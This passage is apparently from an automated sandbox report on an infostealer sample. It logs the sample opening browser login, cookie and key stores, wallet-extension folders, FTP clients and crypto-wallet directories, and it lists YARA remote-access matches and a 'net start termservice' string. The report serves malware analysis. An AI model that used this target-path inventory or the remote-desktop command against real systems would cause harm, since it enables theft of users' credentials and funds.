                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\FTPGetter
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\FTPInfo
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\FTPbox
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\FTPRush
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\ProgramData\SiteDesigner\3D-FTP
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Ledger Live
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Binance
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                    Source: random.exe    Binary or memory string: WIN_81
                                    Source: random.exe    Binary or memory string: WIN_XP
                                    Source: EduGeniusX.com.41.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                    Source: random.exe    Binary or memory string: WIN_XPe
                                    Source: random.exe    Binary or memory string: WIN_VISTA
                                    Source: random.exe    Binary or memory string: WIN_7
                                    Source: random.exe    Binary or memory string: WIN_8
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    Directory queried: C:\Users\user\Documents
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    Directory queried: C:\Users\user\Documents\AQRFEVRTGL
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    Directory queried: C:\Users\user\Documents\AQRFEVRTGL
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe    Directory queried: C:\Users\user\Documents\GIGIYTFFYT

                                    Remote Access Functionality

                                    Source: Yara match    File source: Process Memory Space: V0Bt74c.exe PID: 4860, type: MEMORYSTR
                                    Source: Yara match    File source: 51.2.V0Bt74c.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match    File source: 49.2.V0Bt74c.exe.3549550.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match    File source: 51.2.V0Bt74c.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match    File source: 00000033.00000002.3513079723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match    File source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match    File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe, type: DROPPED
                                    Source: Yara match    File source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe, type: DROPPED
                                    Source: Yara match    File source: dump.pcap, type: PCAP
                                    Source: Yara match    File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe, type: DROPPED
                                    Source: Yara match    File source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe, type: DROPPED
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE    String found in binary or memory: net start termservice
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000002.1267517499.0000000000311000.00000040.00000001.01000000.0000000E.sdmp    String found in binary or memory: net start termservice
